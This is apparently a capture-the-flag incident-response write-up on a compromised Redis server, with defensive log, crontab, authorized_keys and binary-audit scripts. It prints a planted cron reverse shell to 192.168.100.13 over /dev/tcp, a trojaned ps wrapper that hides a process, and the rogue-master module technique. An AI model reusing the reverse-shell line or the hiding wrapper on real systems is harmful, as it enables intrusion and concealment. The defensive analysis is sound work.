Chapter 2 Log Analysis - Redis Incident Response

Step 1

Redis is usually attacked through an unauthenticated instance, followed by master-slave replication to gain privileges.

Look straight at the Redis log under /var/log and you find a full resync in progress here; looking above it, the IP that connected is 192.168.100.20, so that should be the attacker's IP.

Step 2

Looking carefully further down, a module exp.so was loaded; this is the usual technique of the master-slave attack.
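The two log observations above (the replication to an unexpected master in step 1, and the module load in step 2) can be pulled out of a Redis server log automatically. The following is an added example written for this page, not code from the original writeup; the log lines it runs on are constructed, but they follow the message strings Redis itself emits ("Connecting to MASTER", "Full resync from master", "Module '...' loaded from", "MASTER MODE enabled").

```python
import re
from dataclasses import dataclass, field

# Constructed sample Redis server log (not taken from the original page). The
# layout follows Redis' own "pid:role day mon year time level message" format,
# and the messages are the ones Redis emits during a REPLICAOF / MODULE LOAD.
SAMPLE_REDIS_LOG = """\
1254:M 31 Jul 2023 10:12:01.100 * Ready to accept connections
1254:S 31 Jul 2023 10:15:22.302 * Connecting to MASTER 192.168.100.20:6379
1254:S 31 Jul 2023 10:15:22.302 * MASTER <-> REPLICA sync started
1254:S 31 Jul 2023 10:15:22.310 * Full resync from master: 0000000000000000000000000000000000000000:1
1254:S 31 Jul 2023 10:15:22.411 * MASTER <-> REPLICA sync: Flushing old data
1254:S 31 Jul 2023 10:15:22.412 * MASTER <-> REPLICA sync: Loading DB in memory
1254:S 31 Jul 2023 10:15:22.510 * Module 'system' loaded from /exp.so
1254:M 31 Jul 2023 10:15:30.000 * MASTER MODE enabled (user request from 'id=5 addr=192.168.100.20:44212 fd=8 name= age=8 idle=0')
"""

LINE_RE = re.compile(
    r"^(?P<pid>\d+):(?P<role>[A-Z]) "
    r"(?P<ts>\d{2} \w{3} \d{4} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"(?P<level>[.\-*#]) (?P<msg>.*)$"
)
CONNECT_RE = re.compile(r"Connecting to MASTER (?P<peer>\S+)")
MODULE_RE = re.compile(r"Module '(?P<name>[^']+)' loaded from (?P<path>\S+)")


@dataclass
class RedisLogFindings:
    master_peers: list = field(default_factory=list)  # hosts this instance was told to replicate from
    modules: list = field(default_factory=list)       # (module name, path) pairs loaded at runtime
    full_resync: bool = False                         # local dataset replaced by the master's RDB
    timeline: list = field(default_factory=list)      # (timestamp, description), in log order


def triage_redis_log(text: str) -> RedisLogFindings:
    """Pull the replication and module-load events out of a Redis server log."""
    findings = RedisLogFindings()
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not a Redis log line (or a different log format)
        ts, msg = m["ts"], m["msg"]
        if c := CONNECT_RE.search(msg):
            if c["peer"] not in findings.master_peers:
                findings.master_peers.append(c["peer"])
            findings.timeline.append((ts, f"started replicating from {c['peer']}"))
        elif msg.startswith("Full resync from master"):
            findings.full_resync = True
            findings.timeline.append((ts, "full resync: local data replaced by the master's RDB"))
        elif mm := MODULE_RE.search(msg):
            findings.modules.append((mm["name"], mm["path"]))
            findings.timeline.append((ts, f"module {mm['name']!r} loaded from {mm['path']}"))
        elif msg.startswith("MASTER MODE enabled"):
            findings.timeline.append((ts, "replication switched off again (REPLICAOF NO ONE)"))
    return findings


def is_rogue_master_pattern(findings: RedisLogFindings) -> bool:
    """The chain the writeup describes: an unexpected master, a full resync, then a module load."""
    return bool(findings.master_peers) and findings.full_resync and bool(findings.modules)


if __name__ == "__main__":
    f = triage_redis_log(SAMPLE_REDIS_LOG)
    for ts, what in f.timeline:
        print(ts, what)
    print("rogue-master pattern:", is_rogue_master_pattern(f))
```

On a real box, feed it the contents of the Redis log under /var/log; any peer in master_peers that is not your own replication master, and any module path you did not deploy, is what to pivot on next.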

```shell
root@ip-10-0-10-3:/# find / -type f -name exp.so
/exp.so
```
```shell
root@ip-10-0-10-3:/# strings exp.so | awk '/-/'
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
GCC: (Debian 12.2.0-14) 12.2.0
GNU C99 12.2.0 -mtune=generic -march=x86-64 -g -std=gnu99 -fPIC -fasynchronous-unwind-tables
/opt/redis-rogue-getshell/RedisModulesSDK/exp
/usr/include/x86_64-linux-gnu/bits
/usr/lib/gcc/x86_64-linux-gnu/12/include
/usr/include/x86_64-linux-gnu/bits/types
/usr/include/x86_64-linux-gnu/sys
stdint-intn.h
stdint-uintn.h
<built-in>
```

Step 3

```shell
root@ip-10-0-10-3:/# cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
```

What we're after is the reverse shell. It was probably written into a scheduled task; after all, writing a cron job through Redis to gain privileges is one of the attack methods. I had no ideas on this one and looked at the writeup. You could also run linpeas.sh.

```shell
root@ip-10-0-10-3:/etc# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
*/1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h dom mon dow command
```

A backup scheduled task and a reverse-shell scheduled task.

In the end I found that other people also solved this from the logs:

```shell
cat /var/log/syslog.1 |grep '/dev/'
```
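Both routes above (reading the crontab, and grepping syslog for /dev/) can be turned into a small checker. This is an added example written for this page, not code from the original writeup; the crontab and syslog samples are constructed to mirror the shapes seen on the box (Debian's crontab comment header, and the "CRON[pid]: (user) CMD (...)" lines syslog records for each job run).

```python
from __future__ import annotations

import re

# Constructed samples (not from the original page). The crontab mirrors the
# layout of the one in the writeup: Debian's comment header, a backup job,
# and an every-minute job that opens a shell over /dev/tcp.
SAMPLE_CRONTAB = """\
# Edit this file to introduce tasks to be run by cron.
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
*/1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h dom mon dow command
"""

SAMPLE_SYSLOG = """\
Jul 31 10:16:01 ip-10-0-10-3 CRON[2210]: (root) CMD (/bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1)
Jul 31 10:17:01 ip-10-0-10-3 CRON[2231]: (root) CMD (/bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1)
Jul 31 10:17:05 ip-10-0-10-3 systemd[1]: Started Session 12 of user debian.
Jul 31 11:00:01 ip-10-0-10-3 CRON[2400]: (root) CMD (test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.hourly ))
"""

CRON_LINE_RE = re.compile(r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>.+)$")
DEV_TCP_RE = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d+)")
SYSLOG_CRON_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$"
)


def command_indicators(cmd: str) -> tuple[list[str], list[tuple[str, str]]]:
    """Return (reasons, callback endpoints) for one cron command string."""
    reasons, callbacks = [], []
    for m in DEV_TCP_RE.finditer(cmd):  # bash's /dev/tcp pseudo-device = outbound connection
        callbacks.append((m["host"], m["port"]))
        reasons.append(f"bash network redirection to {m['host']}:{m['port']}")
    if re.search(r"\b(?:ba)?sh\s+-i\b", cmd) and re.search(r"[<>]&", cmd):
        reasons.append("interactive shell with stdio redirected")
    return reasons, callbacks


def suspicious_cron_entries(crontab_text: str) -> list[dict]:
    """Parse `crontab -l` output and keep only the jobs that carry an indicator."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):  # comments (including the Debian example job) are skipped
            continue
        m = CRON_LINE_RE.match(s)
        if not m:
            continue
        sched, cmd = m["sched"], m["cmd"]
        reasons, callbacks = command_indicators(cmd)
        if reasons and sched.split()[0] in ("*", "*/1"):
            reasons.append("scheduled every minute")
        if reasons:
            hits.append({"schedule": sched, "command": cmd, "reasons": reasons, "callbacks": callbacks})
    return hits


def cron_executions_from_syslog(syslog_text: str) -> list[tuple[str, str, str]]:
    """(timestamp, user, command) for every CRON run whose command carries an indicator.
    This gives the first execution time, which `crontab -l` alone cannot tell you."""
    out = []
    for line in syslog_text.splitlines():
        m = SYSLOG_CRON_RE.match(line)
        if m and command_indicators(m["cmd"])[0]:
            out.append((m["ts"], m["user"], m["cmd"]))
    return out


if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(hit["schedule"], "|", hit["command"], "|", ", ".join(hit["reasons"]))
    for ts, user, cmd in cron_executions_from_syslog(SAMPLE_SYSLOG):
        print(ts, user, cmd)
```

The syslog side is the useful half for a timeline: the crontab tells you what was planted, the CRON lines tell you when it first fired and as which user.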

Step 4

Finding out the hacker's username is not easy; the only possibility is that he wrote his own public key into the box, and the public key contains the username.

```shell
root@ip-10-0-10-3:/# find / -type f -name authorized_keys
/root/.ssh/authorized_keys
/home/debian/.ssh/authorized_keys
root@ip-10-0-10-3:/# cat /root/.ssh/authorized_keys
REDIS0009� redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
aof-preamble���xxsshB9

ssh-rsa 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 xj-test-user

�<#5Mroot@ip-10-0-10-3:/#
```

It was indeed written in; the username is xj-test-user. That's enough for this step. What follows is that this is a GitHub user who wrote a Redis getshell script containing a certain string; it has since been updated and the string is no longer in it.
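The authorized_keys file above gives itself away twice: it starts with an RDB header (REDIS0009), and the surrounding lines are not key lines at all. An added example for this page (not code from the original writeup) that checks an authorized_keys file for exactly those signs and extracts the comment field of the genuine key lines; the sample file is constructed, and the key blob in it is a fake built in the OpenSSH wire format, not a real key:

```python
import base64
import binascii
import re

KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def _fake_key_blob(key_type: str, body: bytes) -> str:
    """Build an OpenSSH-style key blob (constructed, not a real key): the wire
    format starts with a length-prefixed copy of the key type string."""
    blob = (len(key_type).to_bytes(4, "big") + key_type.encode()
            + len(body).to_bytes(4, "big") + body)
    return base64.b64encode(blob).decode()


# Constructed sample modelled on the file in the writeup: Redis wrote its RDB
# snapshot to the file, so the key line sits between RDB header/trailer bytes.
SAMPLE_AUTHORIZED_KEYS = (
    "REDIS0009\xfa\tredis-ver\x05" + "5.0.1\xfa\n"
    + "\xfaredis-bits\xc0@\xfa\x05ctime\xc2\n"
    + "\n"
    + "ssh-ed25519 " + _fake_key_blob("ssh-ed25519", bytes(range(32))) + " xj-test-user\n"
    + "\n"
    + "\xff<#5M"
)


def embedded_key_type(b64: str):
    """Key type string stored inside the base64 blob, or None if it does not decode."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) < 4:
        return None
    n = int.from_bytes(raw[:4], "big")
    if n > len(raw) - 4:
        return None
    return raw[4:4 + n].decode("ascii", "replace")


def audit_authorized_keys(text: str):
    """Return (keys, anomalies): keys as (line, type, comment); anomalies as (line, reason)."""
    keys, anomalies = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if re.match(r"REDIS\d{4}", s):  # RDB magic + version, e.g. REDIS0009
            anomalies.append((lineno, "RDB header: this file was written by a Redis SAVE"))
            continue
        tokens = s.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            anomalies.append((lineno, "not a public-key line"))
            continue
        ktype, b64 = tokens[idx], tokens[idx + 1]
        if embedded_key_type(b64) != ktype:  # type on the line must match the type inside the blob
            anomalies.append((lineno, f"{ktype} blob does not decode as {ktype}"))
            continue
        keys.append((lineno, ktype, " ".join(tokens[idx + 2:])))  # comment field, often a user@host
    return keys, anomalies


if __name__ == "__main__":
    keys, anomalies = audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS)
    for lineno, ktype, comment in keys:
        print(f"line {lineno}: {ktype} key, comment={comment!r}")
    for lineno, reason in anomalies:
        print(f"line {lineno}: {reason}")
```

The comment field is whatever the key's owner put there when generating it, which is why it leaked the username here; the RDB header is the stronger indicator, since no legitimate process writes one into an SSH file.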

```shell
flag{xj-test-user-wow-you-find-flag}
```

Step 5

The command should be somewhere under /usr/bin, but there are too many files; I didn't find it and looked at the writeup.

```shell
-rwxrwxrwx 1 root root    178 Jul 31  2023 ps
-rwxr-xr-x 1 root root 133432 Jul 31  2023 ps_
```

My guess is to start from permissions and look for files with abnormal permissions?

```shell
root@ip-10-0-10-1:/usr/bin# cat ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
root@ip-10-0-10-1:/usr/bin#
```
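The ps wrapper stands out on three counts that can all be checked mechanically: it is world-writable (rwxrwxrwx), it is a tiny shell script sitting among compiled binaries, and the real tool survives next to it under the name ps_. An added example for this page (not code from the original writeup) that scans a bin directory for exactly that pattern; it builds its own constructed look-alike directory in a temp folder rather than touching the real /usr/bin:

```python
from __future__ import annotations

import os
import stat
import tempfile


def build_fixture() -> str:
    """Constructed /usr/bin look-alike in a temp dir (not the real system):
    a genuine ELF tool, a wrapper script named 'ps', and the renamed original 'ps_'."""
    d = tempfile.mkdtemp(prefix="bin-audit-")

    def put(name: str, data: bytes, mode: int) -> None:
        p = os.path.join(d, name)
        with open(p, "wb") as fh:
            fh.write(data)
        os.chmod(p, mode)

    elf_stub = b"\x7fELF" + b"\x00" * 252  # just the magic, enough for the check
    put("ls", elf_stub, 0o755)
    put("ps_", elf_stub, 0o755)
    put("ps", b"#/bin/bash\nresult=$(ps_ $1 $2 $3|grep -v 'threadd')\necho \"$result\"\n", 0o777)
    return d


def scan_bin_dir(path: str) -> list[tuple[str, list[str]]]:
    """Flag regular files that look like shell wrappers replacing a compiled tool."""
    names = set(os.listdir(path))
    findings = []
    for name in sorted(names):
        p = os.path.join(path, name)
        st = os.lstat(p)
        if not stat.S_ISREG(st.st_mode):
            continue
        with open(p, "rb") as fh:
            head = fh.read(4096)
        is_script = head.startswith(b"#")  # "#!" shebang, or the page's malformed "#/bin/bash"
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if is_script and st.st_size < 1024:
            reasons.append("tiny shell script in a directory of compiled tools")
        sibling = name + "_"
        if is_script and sibling in names:
            with open(os.path.join(path, sibling), "rb") as fh:
                if fh.read(4) == b"\x7fELF":
                    reasons.append(f"ELF sibling '{sibling}' looks like the renamed original")
        if is_script and b"grep -v" in head:  # wrapper hides lines from the real tool's output
            reasons.append("filters its own output with grep -v")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in scan_bin_dir(build_fixture()):
        print(name, "->", "; ".join(reasons))
```

Point scan_bin_dir at the real /usr/bin (or /bin, /usr/sbin) to run it on a live host; package-manager verification (dpkg -V on Debian) is the complementary check, because it catches a replaced binary even when no sibling was left behind.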

Closing words

This target machine doesn't show a single attack flow; it shows how Redis gets attacked: writing a public key, master-slave replication, writing a cron job. All of these can gain privileges through Redis, and what's shown are the common hacker techniques against Redis.

But all of them require unauthenticated access or no password.